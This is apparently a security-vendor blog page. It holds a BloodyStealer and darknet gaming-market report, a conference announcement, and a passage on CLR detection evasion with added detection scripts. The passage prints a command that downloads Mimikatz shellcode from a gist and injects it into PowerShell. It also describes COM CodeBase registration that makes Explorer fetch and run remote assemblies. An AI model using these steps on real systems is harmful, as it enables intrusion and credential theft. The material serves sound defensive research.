September 27, 2021

BloodyStealer and gaming assets for sale

Earlier this year, we covered the threats related to gaming, and looked at the changes from 2020 and the first half of 2021 in mobile and PC games as well as various phishing schemes that capitalize on video games. Many of the threats faced by gamers are associated with loss of personal data, and particularly, accounts with various gaming services.

This tendency is not unique to PC or mobile games or to the gaming industry as a whole. Nevertheless, as games offer users plenty of in-game goodies and even feature their own currencies, gaming accounts are of particular interest to cybercriminals.

In this report, we take a closer look at threats linked to loss of accounts with popular video game digital distribution services, such as Steam and Origin. We also explore the kind of game-related data that ends up on the black market and the prices.


In March 2021, we noticed an advertisement for malware named “BloodyStealer” on a Russian-speaking underground forum. According to the ad, BloodyStealer is a stealer that harvests session data, passwords and cookies, and is protected against reverse engineering and malware analysis in general. A buyer can receive the stolen data through Telegram channels as well as a traditional web panel for communication with the C&C. The author invited potential customers to get in touch via Telegram. BloodyStealer is priced at 700 RUB (less than $10) for one month or 3000 RUB (approx. $40) for a lifetime license.

The BloodyStealer ad

The ad highlights the following features of BloodyStealer (translated from Russian as is):

  • Grabber for cookies, passwords, forms, bank cards from browsers
  • Stealer for all information about the PC and screenshots
  • Steals sessions from the following clients: Bethesda, Epic Games, GOG, Origin, Steam, Telegram, VimeWorld
  • Steals files from the desktop (.txt) and the uTorrent client
  • Collects logs from the memory
  • Duplicate logging protection
  • Reverse engineering protection
  • Not functional in the CIS

What caught our attention is BloodyStealer’s capability to fetch information related to computer games installed on an infected system. BloodyStealer targets major online gaming platforms, such as Steam, Epic Games Store, EA Origin, etc.

At the time of our investigation, the forum thread related to BloodyStealer was publicly unavailable, but the analysis of visible information on the forum revealed that discussions relating to BloodyStealer still continued in private channels. This, along with the fact that visible stealer activity had been observed since its release, suggested that the threat actor behind BloodyStealer had decided to offer its product only to VIP members of underground forums.

Kaspersky products detect the threat as Trojan-Spy.MSIL.Stealer.gen. For additional technical information about BloodyStealer (malicious techniques, YARA rules, etc.), please contact financialintel@kaspersky.com.

BloodyStealer technical details

Anti-analysis

During our research, we were able to identify several anti-analysis methods that were used to complicate reverse engineering and analysis of BloodyStealer, including the usage of packers and anti-debugging techniques. As the stealer is sold on the underground market, every customer can protect their sample with a packer of their choice or include it into a multistage infection chain. We had been monitoring BloodyStealer since its announcement, so we were able to notice that the majority of the BloodyStealer samples were protected with a commercial solution named “AgileNet”.

While analyzing samples discovered in the wild, we found that some of them were protected not only with AgileNet but also with other, very popular, protection tools for the .NET environment, such as Confuser.

Victim identification, communication with the C&C and data exfiltration

BloodyStealer assigns a unique identifier to every infected victim. The identifier is built at runtime from system data such as the GUID and serial number (SID) of the system. Besides this identification, BloodyStealer determines the public IP address of the infected host by requesting it from whatleaks[.]com, a service that reports the requester's own external address.

The request used to get the public IP

After assigning a UID to the victim and obtaining the public IP address, BloodyStealer extracts various data from the infected machine, creates a POST request with information about the exfiltrated data, and sends it to the malicious C&C. The data itself is sent to the configured C&C server later as an unprotected ZIP archive with the structure shown below.

The IP address of the infected system is used as the name of the ZIP archive.

BloodyStealer as part of a multistage infection chain

In our analysis of BloodyStealer samples, we found out how various threat actors who had acquired this product decided to use the stealer as a part of other malware execution chains, for example, KeyBase or Agent Tesla. The criminals who combined the stealer component with other malware families also protected BloodyStealer with other packers, such as Themida.

BloodyStealer as used alongside other malware families or hacking tools

Based on the price that BloodyStealer is fetching on the underground market, we can expect that it will be used in combination with other popular malware families.

Command and Control

As mentioned above, BloodyStealer sends all exfiltrated data to a C&C server. Cybercriminals can access the data by using Telegram or via a web panel. The collected data can then be sold to other cybercriminals, who in turn will try to monetize it.

BloodyStealer C&C login page

When a criminal is logged in to the C&C web panel, they will see a basic dashboard with victim-related statistics.

BloodyStealer stats dashboard

While pivoting through the structure used for allocating the content panel, we were able to identify the second C&C server located at


Both C&C servers are placed behind Cloudflare, which hides their original IPs and provides a layer of protection against DDoS and web attacks.


BloodyStealer is still quite new on the market compared to other existing malware tools; however, by analyzing available telemetry data, we have found detections of BloodyStealer in Europe, Latin America and the APAC region. At the time of the investigation, BloodyStealer mostly affected home users.

Next links in the chain: darknet markets

Unfortunately, BloodyStealer is just one example of stealers targeting gamers. With many more in use, cybercriminals gather a significant number of game-related logs, login credentials, and other data, spurring a well-developed supply and demand chain for stolen credentials on the dark web. In this section, we will dig deeper into the dark gaming market and look at the types of game-related items available there.

Our experts, who specialize in understanding what goes on on the dark web, conducted research on the current state of user data as a commodity on these platforms to find out what kind of personal data is in demand, what it is used for, and how much it costs. For the purposes of this report, we analyzed active offers on twelve international darknet forums and marketplaces that use English or Russian.

Wholesale deals

Dark web sellers provide a broad variety of goods, sold both wholesale and retail. Specifically, one of the most popular wholesale products is logs.

In these examples, cybercriminals offer logs: an archive containing more than 65,000 logs for $150 and packages of 1,000 private logs for $300

Logs are the credentials needed to access an account. They typically take the form of saved browser cookies, information about server logins, screenshots of the desktop, etc. They are the key to victims' accounts. Logs may be outdated, contain only old game sessions or even hold no account-related data at all, which is why they need to be checked before use. The chain of log sales involves several roles.

Firstly, there are the people who steal logs with the help of botnets or phishing schemes: the operators. The operators may have thousands of collected logs in their cloud storage, but this whole data stream needs to be validated. To process the logs, the cybercriminal needs to check whether the login and password combination is still valid, how many days have passed since the last password or email change (that is, whether the victim has found out that the account was stolen), and check the balance. The fraudsters might do this themselves, but with thousands of logs to go through it is time-consuming. For this there are log checkers: cybercriminals who own special tools for processing logs. The software collects statistics about processed logs, and the checker gets a share of the profits: typically 40%.

It is possible to purchase logs per unit and process them manually or purchase in bulk and process with the help of specialized services. The average price per log is 34¢; the price per 100 logs is $17.83.

This advertiser is offering a batch of logs for $25,000 to one person but makes no mention of the volume of data

There are also fraudsters who run websites with a large audience and offer to place links to malware on them as a means of distribution. In their darknet ads, these fraudsters attach traffic and download statistics to attract more customers.

Retail options

If a cybercriminal specializes in small sales (two to ten items), the goods they offer on the darknet will include specific games, in-game items, and accounts with popular gaming platforms. Importantly, these products are typically offered at just 60-70% of their original price, so buyers get a bargain on darknet markets. Some criminals possess thousands of accounts and offer them at an enormous discount, as many of these accounts are useless: some are worth nothing, and others have already been recovered by their original owners.

A person is offering thousands of usernames and passwords for various game platforms for just $4000

Dark web sellers offer stolen accounts, the important selection criteria being the number of games available in the account and how long ago the account was created. Games and add-ons are not cheap, and this is where cybercriminals enter the fray, offering the same popular games at significantly lower prices. In addition to Steam, accounts on gaming platforms, such as Origin, Ubisoft Store, GOG, Battle.net, also get stolen and resold.


A seller is offering in-game items. The original price is $20.5, but customers can get these illegally for $16.45.

In addition to specific games and accounts, cybercriminals also sell rare equipment from a wide range of games at a 30-40% discount off the original price. This is possible if the Steam account that owns the items has no restrictions on sending gifts to other players, e.g., no email confirmation requirement.

Some cybercriminals also sell so-called “Steam balance”. Depending on its origin, Steam balance can be “white” or “black”. White means it is sold from the seller's own account. A player may get tired of a game and decide to sell their account, along with all associated in-game goodies, offering it on the black market, as Valve does not approve of this kind of deal. Accounts like that can be used for illegal activity, such as fraud or money laundering, as they do not – yet – look suspicious to Steam. Black balance means that the Steam accounts were obtained illegally, e.g., through phishing, social engineering or other cybercriminal techniques. Cybercriminals do their best to withdraw the money by buying Steam cards, in-game items, gifts, etc., before the original owners retake control of their property with the help of the support service.

A person is outlining a scheme for stealing accounts with the help of PUBG phishing pages

Besides buying goods, darknet forum visitors can also purchase access to phishing instruments, which is a less popular offer. As you can see in the screenshot, the cybercriminal is offering a tool named “Black Mafia”. Phishing tools can even be downloaded from GitHub, after accepting the condition that these will be used for educational purposes only.

A criminal can use the tool for creating a phishing link and sending it to an unsuspecting victim. This generally follows the tried and tested flow: the victim clicks the link and inputs their credentials, which then end up in the hands of the fraudsters.


This overview demonstrates the structure of the game log and login stealing business. With the gaming industry growing, we do not expect this cybercriminal activity to wane in the future; on the contrary, this is an area in which we are likely to see more attacks as tools for targeting gamers continue to develop. BloodyStealer is a prime example of an advanced tool used by cybercriminals to penetrate the gaming market. With its efficient anti-detection techniques and attractive pricing, it is sure to be seen in combination with other malware families soon. Furthermore, with capabilities such as extraction of browser passwords, cookies and environment information, as well as grabbing data related to online gaming platforms, BloodyStealer provides value in terms of the data that can be stolen from gamers and later sold on the darknet. The overview of game-related goods sold on darknet forums confirms that this is a lucrative niche for cybercriminals. With online gaming platform accounts holding valuable in-game goods and currency, these become a juicy target. Although purchasing accounts is a gamble, as they may or may not contain goods that can be sold, cybercriminals are willing to take the bet, and are certain to find customers looking to save on entertainment.

To minimize the risks of losing your gaming account, follow these simple tips:

  • Wherever possible, protect your accounts with two-factor authentication. Where it is not offered, comb through the account settings for the other protections available.
  • A strong, reliable security solution will be a great help to you, especially if it will not slow down your computer while you are playing. At the same time, it will protect you from all possible cyberthreats. We recommend Kaspersky Total Security. It works smoothly with Steam and other gaming services.
  • It is safer to buy games on official sites only and wait for the sales – these take place fairly often and are typically tied to big holidays such as Halloween, Christmas, Saint Valentine’s Day, so you will not be sitting on your hands for long.
  • Try to avoid buying the first thing that pops up. Even during Steam’s summer sale, before forking out the dough for a little-known title, at least read some reviews of it. If something is fishy, people will probably have figured it out.
  • Beware of phishing campaigns and unfamiliar gamers contacting you. It is a good idea to double-check before clicking website links you receive via email and the extensions of files you are about to open.
  • Try not to click on any links to external sites from the game chat, and carefully check the address of any resource that requests you to enter your username and password: the page may be fake.
September 23, 2021

Wake me up till SAS summit ends

What do cyberthreats, Kubernetes and donuts have in common – except that all three end in “ts”, that is? All these topics will be mentioned during the new SAS@Home online conference, scheduled for September 28th-29th, 2021. To be more specific, there will be a workshop titled, “Prevent & Detect Security Threats in the Kubernetes Era” and a presentation titled, “Time to Make the Donuts”, the latter presumably not about actual doughnuts. As for cyberthreats, this topic is always on the table because it is the phenomenon we confront every day and the cause that unites us researchers.

What else can we offer during the two eventful days?

  • Kaspersky experts Igor Kuznetsov and Georgy Kucherin will tell a story of how they investigated top-class commercial spyware and dissected an infamous toolset.
  • Rintaro Koike, Shogo Hayashi and Ryuichi Tanabe of NTT Security, Japan will present a research paper, titled, “Operation Software Concepts: A Beautiful Envelope for Wrapping Weapon”.
  • Ivan Kwiatkowski and Pierre Delcher of Kaspersky GReAT will describe possible links between the Tomiris malware and the supply-chain attack on SolarWinds.
  • PwC's John Southworth will teach the audience to dance with APT41.
  • More details about the GhostEmperor APT, tools to catch zero-click zero-days, supply-chain attacks in Farsi and, of course, our usual workshops.

Last but not least, we are preparing worthy challenges for everyone interested in malware analysis and threat hunting. During SAS@Home, in the 9th edition of our by now well-established CTF/Hackgame, players will compete in five categories, trying to solve challenges presented by CTF hosts David Jacoby and Marco Preuss. This year, we will have the following categories: kNOW yOUR eNEMY, dEBUGGERS pARADISE, oLDsKOOL, cODEbREAKER and THE WiLD WEB, each with five amazing levels. You do not need to be a reversing wizard, guru programmer or ninja analyst – there is something for everyone to tackle and solve.

At the end, the top five players will win a seat at Kaspersky xTraining, worth $1,400! However, our game is not just about prizes, but about having fun and learning something new. Always remember: you cannot lose anything, but you can win it all.

September 21, 2021

Detection evasion in CLR and tips on how to detect such attacks

In terms of costs, the age-old battle that pits attacker against defender has become very one-sided in recent years. Almost all modern attacks (and ethical offensive exercises) use Mimikatz, SharpHound, Seatbelt, Rubeus, GhostPack and other toolsets available to the community. This so-called githubification is driving attackers' costs down and shifting the focus from malware development to the evasion of security mechanisms. What's the point of creating a tool that can be detected by EPP solutions when you can gain more by simply reusing existing tools and learning how to perform attacks with them? It places the onus – and the costs – on the defender, who suddenly needs new expertise, tools and processes.

Fileless and malwareless attacks, heavy usage of the LOLBAS list, runtime encryption, downloaders, packers, as well as old, repurposed and completely new techniques to evade a variety of security tools and controls – all of these are actively used by attackers. No one is surprised by Mimikatz being embedded in InstallUtil.exe. In this article we describe an evasion technique that can be employed to hide offensive activity in memory, namely how to delete indicators from memory. We then provide some tools and methods that may be useful for detecting this technique. We review applications running in or using the CLR (Common Language Runtime) environment, such as PowerShell, numerous LOLBAS tools, and multiple C# utilities.

If you’re already familiar with CLR, you can go straight to Detection evasion in CLR.

CLR basics

When you compile source code written in C#, the compiler doesn't give you a ready-to-run PE file but an assembly. This is primarily a set of instructions (CIL code) from which the runtime environment generates native code (which is then executed) while the assembly runs. The process of creating native code from the assembly at runtime is called JIT compilation.

Common Language Runtime. Source: https://ru.wikipedia.org/wiki/Common_Language_Runtime

The assembly resulting from the compilation of an application will contain the following data:

  • Metainformation on classes, interfaces, types, methods and fields in the assembly. These data are needed for CLR to handle the written code: load it, reference it, run one code from another, and pass input and output data. The process of reading and applying this data is called reflection.
  • The code itself, defined in modules. It just can’t be launched without being processed in CLR.
  • Assembly Manifest containing data on security, versions, dependencies and the assembly elements. The manifest defines what is needed to execute code. For instance, if your code needs https://github.com/JamesNK/Newtonsoft.Json to be launched, it will be defined in the manifest.
  • All types of files and data, which can be included in the assembly itself or stored as separate files.

Loading and execution of assemblies is a complicated process – let’s take a closer look at how it works.

Process startup

The ETW CLR Runtime Provider (GUID e13c0d23-ccbc-4e12-931b-d9cc2eee27e4) gives a good indication of a process startup with managed code.

The provider's events, with the event ID and the number expected per process:

  • RuntimeInformationEvent (EventID 187), one per process: CLR launched.
  • AppDomainLoad_V1 (EventID 156), many: AppDomain loaded.
  • AssemblyLoad_V1 (EventID 154), many: Assembly loaded.
  • ModuleLoad_V2 (EventID 152), many: Module loaded. Our code is here.
  • ModuleUnload_V2 (EventID 153), many: Module unloaded.
  • AssemblyUnload_V1 (EventID 155), many: Assembly unloaded.
  • AppDomainUnLoad_V1 (EventID 157), many: AppDomain unloaded. From a SOC analyst's point of view, it is interesting if this event happens many times at random intervals.

CLR launch

Microsoft implemented the CLR as a COM server inside a DLL. This means that a standard COM interface is used for the CLR environment, and a GUID is assigned to this interface and to the COM server. When the .NET Framework is installed, the COM server representing the CLR is registered in the Windows Registry just like any other COM server. Any Windows application can host the CLR. This kind of hosting generates event 187 with information on CLR activation, including COM activation data: the StartupMode and ComObjectGUID fields contain useful information on how the CLR was loaded, which is especially interesting in the case of COM activation.

Refer to the MetaHost.h C++ header file provided with the .NET Framework SDK if you need more information on this topic. This header file specifies the GUIDs and the definition of the unmanaged ICLRMetaHost interface, and from it you can learn how to host the CLR from any language: C++, Python, etc.

Application domain load

Event 156 appears: loading of the application domain into the CLR. When the CLR COM server initializes, it creates an application domain. The AppDomain represents a logical container for a set of assemblies that typically implement an application. Also, the application domain is a mechanism implemented in the CLR that allows you to run a group of applications as a single process ensuring their relative isolation while allowing them to interact with each other much faster. There can be multiple application domains in a single process. The first application domain will be created when the CLR environment is initialized. It’s called the default application domain and is only destroyed when the Windows process terminates.

Objects created in one application domain cannot be directly accessed by code in another application domain. When code in an application domain creates an object, the object “belongs” to that application domain. Also, an object (including an artifact) is not allowed to outlive the application domain whose code created it. Code in one application domain can only access an object in another application domain by marshalling (data transfer), by reference or by value. This ensures clear separation and boundaries, since code in one application domain cannot hold a direct reference to an object created by code in another. This isolation is what makes it easy to unload application domains from the process without affecting the code running in other application domains.

Note that this is precisely what allows application domains to be unloaded. The CLR does not support the ability to unload a single assembly from an AppDomain. However, you can command the CLR to unload the entire AppDomain, which will unload all the assemblies it currently contains.

Each application running in its own address space is a great feature. It ensures that code of one application cannot access code or data used by another. Process isolation prevents security breaches, data corruption and other unpredictable actions, making Windows and the applications running on it reliable. Unfortunately, creating processes in Windows is very “expensive”. The Win32 CreateProcess function is very slow, and Windows requires a significant amount of memory to virtualize the process address space.

However, if the application consists entirely of managed code that is verifiably safe and does not invoke unmanaged code, there is no problem with running multiple managed applications in the same Windows process. Application domains provide the isolation necessary to protect, configure and terminate each of these applications. The unit of isolation for code in the CLR is the application domain, not the process. We can say, with a few assumptions, that a process start in Win32 semantics is equivalent to the creation of an application domain. For a SOC analyst, it is better to treat the application domain load and process start events as functionally the same.

There is no hard-coded limit on the number of application domains that can run in a single Windows process. Just like with IIS server sites, each site is a separate application domain with its own isolation and can be unloaded from the server without affecting the other sites.
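The two analyst rules stated above (treat every AppDomain load like a process start; be suspicious of a process that unloads AppDomains many times at random intervals) applied to the CLR Runtime Provider event IDs from the table in the Process startup section, as an added Python example that is not part of the original article. The event records are constructed for the example and the ClrEvent field names are an assumption, not the provider's payload schema; in practice you would feed it records collected from the provider with an ETW consumer.

```python
"""Triage of CLR Runtime Provider ETW events (added example, not from the article).

Every AppDomainLoad (156) is reported like a process start, and a process that
fires AppDomainUnload (157) repeatedly is flagged together with the assemblies
that lived in the unloaded domains. Records are constructed; field names are an
assumption, not the provider's payload schema.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

RUNTIME_INFO, APPDOMAIN_LOAD, APPDOMAIN_UNLOAD, ASSEMBLY_LOAD = 187, 156, 157, 154

# Assembly names typical of "githubified" tooling; extend from your own detections.
OFFENSIVE_ASSEMBLIES = ("rubeus", "seatbelt", "sharphound", "mimikatz", "covenant")


@dataclass(frozen=True)
class ClrEvent:
    ts: float        # seconds since trace start
    pid: int
    image: str       # host process image name
    event_id: int
    name: str = ""   # AppDomain or assembly name carried in the event payload


# Constructed sample: explorer.exe (pid 3896) creates three short-lived AppDomains,
# each carrying one offensive assembly; powershell.exe (pid 1604) behaves normally.
SAMPLE_EVENTS: List[ClrEvent] = [
    ClrEvent(0.0, 3896, "explorer.exe", RUNTIME_INFO),
    ClrEvent(0.1, 3896, "explorer.exe", APPDOMAIN_LOAD, "DefaultDomain"),
    ClrEvent(0.2, 3896, "explorer.exe", ASSEMBLY_LOAD, "ReadOnlyFileIconOverlayHandler"),
    ClrEvent(5.0, 3896, "explorer.exe", APPDOMAIN_LOAD, "d1"),
    ClrEvent(5.1, 3896, "explorer.exe", ASSEMBLY_LOAD, "Rubeus"),
    ClrEvent(9.8, 3896, "explorer.exe", APPDOMAIN_UNLOAD, "d1"),
    ClrEvent(31.4, 3896, "explorer.exe", APPDOMAIN_LOAD, "d2"),
    ClrEvent(31.5, 3896, "explorer.exe", ASSEMBLY_LOAD, "Seatbelt"),
    ClrEvent(33.1, 3896, "explorer.exe", APPDOMAIN_UNLOAD, "d2"),
    ClrEvent(80.2, 3896, "explorer.exe", APPDOMAIN_LOAD, "d3"),
    ClrEvent(80.3, 3896, "explorer.exe", ASSEMBLY_LOAD, "Mimikatz"),
    ClrEvent(95.1, 3896, "explorer.exe", APPDOMAIN_UNLOAD, "d3"),
    ClrEvent(2.0, 1604, "powershell.exe", RUNTIME_INFO),
    ClrEvent(2.1, 1604, "powershell.exe", APPDOMAIN_LOAD, "DefaultDomain"),
    ClrEvent(2.2, 1604, "powershell.exe", ASSEMBLY_LOAD, "System.Management.Automation"),
]


def pseudo_process_starts(events: List[ClrEvent]) -> List[dict]:
    """Report every AppDomainLoad as if it were a process-start event."""
    return [
        {"ts": e.ts, "pid": e.pid, "image": e.image, "appdomain": e.name}
        for e in sorted(events, key=lambda ev: ev.ts)
        if e.event_id == APPDOMAIN_LOAD
    ]


def appdomain_churn(events: List[ClrEvent], min_unloads: int = 2) -> Dict[int, dict]:
    """Flag processes that unload AppDomains at least min_unloads times.

    Returns, per flagged pid, the unloaded domain names, the gaps between the
    unloads (irregular gaps are the "random intervals" an analyst looks for)
    and the assemblies loaded while those domains were alive.
    """
    by_pid: Dict[int, List[ClrEvent]] = defaultdict(list)
    for e in events:
        by_pid[e.pid].append(e)

    findings: Dict[int, dict] = {}
    for pid, evs in by_pid.items():
        evs.sort(key=lambda ev: ev.ts)
        unloads = [e for e in evs if e.event_id == APPDOMAIN_UNLOAD]
        if len(unloads) < min_unloads:
            continue
        loaded: List[str] = []
        for u in unloads:
            # If the trace started after the domain was created, fall back to the first event.
            start = next((e.ts for e in evs
                          if e.event_id == APPDOMAIN_LOAD and e.name == u.name), evs[0].ts)
            loaded += [e.name for e in evs
                       if e.event_id == ASSEMBLY_LOAD and start <= e.ts <= u.ts]
        ts = [u.ts for u in unloads]
        findings[pid] = {
            "image": evs[0].image,
            "unloaded_domains": sorted(u.name for u in unloads),
            "unload_gaps": [round(b - a, 1) for a, b in zip(ts, ts[1:])],
            "assemblies": loaded,
            "offensive": [a for a in loaded if a.lower().startswith(OFFENSIVE_ASSEMBLIES)],
        }
    return findings


if __name__ == "__main__":
    for rec in pseudo_process_starts(SAMPLE_EVENTS):
        print("AppDomain load treated as process start:", rec)
    for pid, f in appdomain_churn(SAMPLE_EVENTS).items():
        print(f"pid {pid} ({f['image']}): {len(f['unloaded_domains'])} AppDomain unloads, "
              f"gaps {f['unload_gaps']} s, offensive assemblies {f['offensive']}")
```

On the constructed sample, explorer.exe is the only process reported: three AppDomain unloads with gaps of 23.3 s and 62.0 s, and Rubeus, Seatbelt and Mimikatz loaded into the domains that disappeared; powershell.exe keeps its single default domain and stays quiet. The default-domain loads of both processes show up as pseudo process starts, which is exactly the noise level a classic process-start rule produces.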

Assembly load

Next, the assembly needs to be loaded into the application domain or a shared domain if the assembly is going to be shared between application domains. Such assemblies are called domain-neutral and we won’t address them in this article. The assembly determines a set of rules for the code it contains, providing the CLR (and other code) with information about the types and classes defined in the assembly.

Module load

Modules with CIL code are loaded into the assembly. The CIL code then goes through JIT compilation to produce executable native code in accordance with the manifest. Note that we need to unload the entire application domain in order to remove an artifact that is defined in (or produced by the execution of) the module.

The figure shows a single Windows process running a single CLR COM server. This CLR environment currently manages two AppDomains. Both AppDomains have their own loader heap, each of which maintains a record of what types have been available since the AppDomain creation. Each loader heap has a method table and each entry in the method table points to JIT-compiled native code if the method has been executed at least once.

Source: CLR via C#, Jeffrey Richter

Detection evasion in CLR

First, let’s look at when and how the attack will be detected. For this purpose, we will analyze an attack using the Covenant framework.

Running Covenant in a single application domain

Let’s look at how the Covenant framework works. By firing up the Grunt agent and executing typical offensive activities, we can collect information on the current user, AutoStart and AutoRun entries, Kerberos tickets loaded into the current user’s session, as well as the browser history. As a result, we can see several assemblies loaded into our application domain: Seatbelt AutoRuns, Seatbelt ChromeHistory, Rubeus klist and others.

Loaded assemblies of Rubeus and Seatbelt

A set of assemblies with different functions is loaded into the same application domain in a single process. Such assemblies are easily detected by classic security tools using signature analysis (there are plenty of indicators in the code and in the execution results). It is also impossible to unload them, because they are bound to the same application domain as the code that implements the interaction with the C2.

Process start and injection

How do attackers try to stay undetected? They may use the classic means of code separation: code injection and/or starting a new process for their malicious purposes. However, that is not always possible: there are situations where both an injection and the start of a new process are too conspicuous for security monitoring tools. It is also not always possible to terminate a process that contains an indicator, for example if the attacker has used a system process. To illustrate this, we create Mimikatz shellcode (with Donut) and inject it into a process (I chose PowerShell) using ProcessInjection, launched from Covenant's Grunt. It is the same method described in the lab here. We can observe both the start of the injector process and the injection itself with Sysmon using the “default” config by SwiftOnSecurity.

Uploading injector application

Starting injector and injecting shellcode

Grunt on the victim's host executed ProcessInjection.exe with the command line below (base64-encoded shellcode hosted in a gist):

ProcessInjection.exe /t:1 /f:base64 /pid:1604 /url:https://gist.githubusercontent.com/gam4er/07aae8b5284c9aa54ff976c3f4bc0cd9/raw/ec0de97792230bbb0526dd60659c3e1c75c3a63b/Mimi

And Sysmon shows lots of suspicious activities as shown below.

Create executable file

Create process

Inject code from ProcessInjection.exe into powershell.exe

With AV/EPP/EDR in place, this execution chain cannot be completed because it is a well-known attacker activity pattern. The conclusion: the old methods of running, spawning and injecting code are very noticeable.

COM-based CLR agent

Now I would like to describe a way that will cause a remote machine to download and run code through the activation of a COM server in the Explorer process.

Let’s register our COM server as MSCOREE library (implements CLR functionality in Windows) with the inputs: name of assembly and class with server implementation. As a result, we instructed the CLR to load the code implementing the server from the specified class in the event of activation.

Note the CodeBase key. It allows us to use the COM server without registering our assembly in the Global Assembly Cache and to define the COM server on behalf of the user (GAC registration requires administrative privileges). This parameter takes a URI and is a little unusual. The host process downloads the assembly containing the COM server from the network and launches it. COM server registration is also possible via the network: we just need to change the system registry to define it.

There are multiple CLR configuration methods as well as parameters: configuration files and global environmental variables. Moreover, there is a special parameter that allows or forbids (forbids by default) assemblies loading from remote sources. However, CLR activation using a COM server in the Explorer host process is allowed by default (assemblies can be downloaded from remote sources). It’s not a vulnerability, but a feature.
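A defender-side check for the registration described above, as an added Python example that is not part of the original article: it parses the text of a registry export of the CLSID hive, keeps every InprocServer32 key whose default value is mscoree.dll (that is, a COM server implemented as a .NET class), and reports the Assembly, Class and CodeBase values, marking any CodeBase that the CLR would have to fetch over HTTP, FTP or a UNC share. The export is constructed for the example: the first CLSID repeats the values of this article's demo registration, the other CLSIDs, assembly names and the Contoso paths are invented. On a real host you would produce the input with reg export (the file is UTF-16; decode it before parsing).

```python
r"""Hunt a .reg export for CLR-hosted COM servers with a remote CodeBase
(added example, not from the article).

Input: text of `reg export HKLM\SOFTWARE\Classes\CLSID <file>`. Output: every
CLSID whose InprocServer32 is mscoree.dll, with its CLR registration values and
a 'remote' flag when the assembly would be downloaded from the network.
The export below is constructed; only the first CLSID repeats the article's demo.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}]
@="ReadOnlyFileIconOverlayHandler"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32]
@="mscoree.dll"
"Assembly"="ReadOnlyFileIconOverlayHandler, Version=, Culture=neutral, PublicKeyToken=1aadad2b22ca8c0e"
"Class"="ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler"
"RuntimeVersion"="v4.0.30319"
"ThreadingModel"="Both"
"CodeBase"="http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="mscoree.dll"
"Assembly"="Contoso.ShellExt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=0123456789abcdef"
"Class"="Contoso.ShellExt.Handler"
"RuntimeVersion"="v4.0.30319"
"CodeBase"="file:///C:/Program Files/Contoso/Contoso.ShellExt.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22222222-3333-4444-5555-666666666666}\InprocServer32]
@="mscoree.dll"
"Assembly"="Contoso.Sync, Version=1.0.0.0, Culture=neutral, PublicKeyToken=0123456789abcdef"
"Class"="Contoso.Sync.Handler"
"CodeBase"="\\\\ts-dc1.enterprise.lab\\share\\Contoso.Sync.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66666666-7777-8888-9999-000000000000}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
"ThreadingModel"="Apartment"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")="((?:[^"\\]|\\.)*)"$')  # REG_SZ lines only
REMOTE_SCHEMES = {"http", "https", "ftp"}


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: key path -> {value name: string data}. Non-string types are skipped."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := KEY_RE.match(line)):
            current = m.group(1)
            keys.setdefault(current, {})
        elif current is not None and (m := VAL_RE.match(line)):
            name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
            keys[current][name] = re.sub(r"\\(.)", r"\1", m.group(2))  # undo \\ and \" escapes
    return keys


def codebase_is_remote(codebase: str) -> bool:
    """True when the CLR would have to fetch the assembly over the network."""
    if codebase.startswith("\\\\"):          # UNC path
        return True
    u = urlparse(codebase)
    if u.scheme.lower() in REMOTE_SCHEMES:
        return True
    return u.scheme.lower() == "file" and u.netloc not in ("", "localhost")  # file://server/share


def find_clr_com_servers(keys: Dict[str, Dict[str, str]]) -> List[dict]:
    """Return every CLSID whose InprocServer32 is mscoree.dll, with its CLR settings."""
    found = []
    for path, vals in keys.items():
        if not path.lower().endswith("\\inprocserver32") or vals.get("@", "").lower() != "mscoree.dll":
            continue
        codebase = vals.get("CodeBase", "")
        found.append({
            "clsid": path.split("\\")[-2],
            "assembly": vals.get("Assembly", ""),
            "class": vals.get("Class", ""),
            "codebase": codebase,
            "remote": codebase_is_remote(codebase),
        })
    return found


if __name__ == "__main__":
    for s in find_clr_com_servers(parse_reg(SAMPLE_REG)):
        flag = "REMOTE CODEBASE" if s["remote"] else "local"
        print(f"{s['clsid']} {s['class']} <- {s['codebase'] or '(GAC)'} [{flag}]")
```

The check is deliberately scoped to mscoree.dll servers rather than to CodeBase alone, because a CodeBase pointing at a local file is normal for .NET COM components installed outside the GAC; the combination of a managed in-process server and a network location is the thing worth an alert. Run it against HKCU\Software\Classes\CLSID as well, since per-user registration needs no administrative privileges.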

Demo attack: Complicating things for detection

We mentioned that a single application domain (Running Covenant in a single application domain) and project creation/injection (Process start and injection) can be detected can be detected with varying degrees of difficulty, but are primarily high-profile, visible activities. We also showed how to set up remote code loading to CLR. Now let’s look at how detection tasks can be complicated on a demo with a COM-based CLR agent. We will be running vanilla Mimikatz in the context of the Explorer process on the remote host and clearing up artefacts after Mimikatz execution. This demo attack is conducted on a host we already have access to. Every step is available in the following video with transcript below. The transcript also contains timestamps in case you want to start watching from a particular step.

We have Yara scanner and Yara rules from Mimikatz repo as our EPP of choice to scan memory. Inveigh and Mimikatz are already installed on the victim’s host. First, let’s check that the Yara rule is a match.

Now let’s look at the explorer.exe process (PID 3896) and confirm that there are no signs of Mimikatz inside. Next, we restart explorer.exe to show once more that it’s clean and doesn’t contain any CLR assemblies.

Next, we move to the attacker’s host (01:40) and register an Explorer icon overlay handler in the victim’s registry. When the victim starts explorer.exe, an assembly from the remote (attacker-controlled) host will be downloaded and executed.

